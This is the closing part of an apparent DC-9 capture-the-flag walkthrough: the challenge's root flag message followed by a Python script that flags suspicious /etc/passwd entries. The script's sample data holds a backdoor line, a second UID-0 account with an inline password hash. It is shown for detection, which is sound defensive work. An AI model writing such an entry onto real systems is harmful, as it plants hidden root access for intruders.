╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.


root@dc-9:~#
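From the defender's side the entry just appended is easy to spot: a second UID-0 account whose hash sits in /etc/passwd itself instead of in /etc/shadow. The audit below is an added example, not from the post; its sample passwd text is constructed and includes the post's demo line.

```python
#!/usr/bin/env python3
"""Flag /etc/passwd entries of the kind the DC-9 escalation appends
(added example, not from the original post)."""
from typing import List, Tuple

# Constructed sample: normal entries plus the post's injected 'demo' line and
# an account with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003::/home/fredf:/bin/bash
demo:$1$demo$N8rNOM51XVLc6Sj7cqsmT/:0:0::/root:/bin/bash
guest::1004:1004::/home/guest:/bin/bash
"""

UID0_REASON = "UID 0 account other than root"
INLINE_HASH_REASON = "password hash stored inline instead of in /etc/shadow"
EMPTY_PW_REASON = "empty password field (passwordless login)"


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) pairs for every suspicious passwd entry."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed entry ({len(fields)} fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((name, UID0_REASON))
        if pw == "":
            findings.append((name, EMPTY_PW_REASON))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # 'x' defers to /etc/shadow; '*' and '!...' mark locked accounts.
            findings.append((name, INLINE_HASH_REASON))
    return findings


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

Pointing it at the real file (`audit_passwd(open("/etc/passwd").read())`) gives the same checks on a live host.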
------------- Paper is short but feelings run long; see you next time -------------